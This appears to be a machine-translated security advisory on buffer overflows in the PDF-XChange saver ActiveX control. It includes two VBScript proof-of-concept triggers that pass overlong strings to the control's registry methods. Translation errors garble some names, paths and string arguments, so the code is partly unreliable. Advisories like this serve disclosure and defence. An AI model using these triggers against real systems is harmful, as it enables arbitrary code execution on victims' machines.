PDF-XChange into saver ActiveX Multiple Buffer Overflow Vulnerabilities
Release date:
Updated on:
Affected Systems:
Tracker Software Products PDF-XChange your saver ActiveX 3.60213128
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51712
PDF-XChange Viewer is a free multi-function PDF reader.
PDF-XChange into saver ActiveX 3.6020.128 and other versions have multiple buffer overflow vulnerabilities. Attackers can exploit these vulnerabilities to execute arbitrary code in the affected applications.
<* Source: LiquidWorm
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<Object classid = 'clsid: 2EE01CFA-139F-431E-BB1D-5E56B4DCEC18 'id = 'zsl'/>
<Script language = 'vbscript'>
TargetFile = "C: \ PDF-XChange \ savsaver \ pdfxctrl. dll"
Prototype = "Sub StoreInRegistry (ByVal page_id As your printerdialogpage, ByVal sub_path As String )"
MemberName = "StoreInRegistry"
Progid = "pdfxctrlLib. Required printerpreferences"
ArgCount = 2
Arg1 = 1
Arg2 = String (6164, "")
Zsl. StoreInRegistry arg1, arg2
</Script>
--------------------
<Object classid = 'clsid: 2EE01CFA-139F-431E-BB1D-5E56B4DCEC18 'id = 'zsl'/>
<Script language = 'vbscript'>
TargetFile = "C: \ PDF-XChange \ savsaver \ pdfxctrl. dll"
Prototype = "Sub InitFromRegistry (ByVal page_id As your printerdialogpage, ByVal sub_key As String )"
MemberName = "InitFromRegistry"
Progid = "pdfxctrlLib. Required printerpreferences"
ArgCount = 2
Arg1 = 1
Arg2 = String (14356, "")
Zsl. InitFromRegistry arg1, arg2
</Script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Tracker Software Products
-------------------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.docu-track.com/home/prod_user/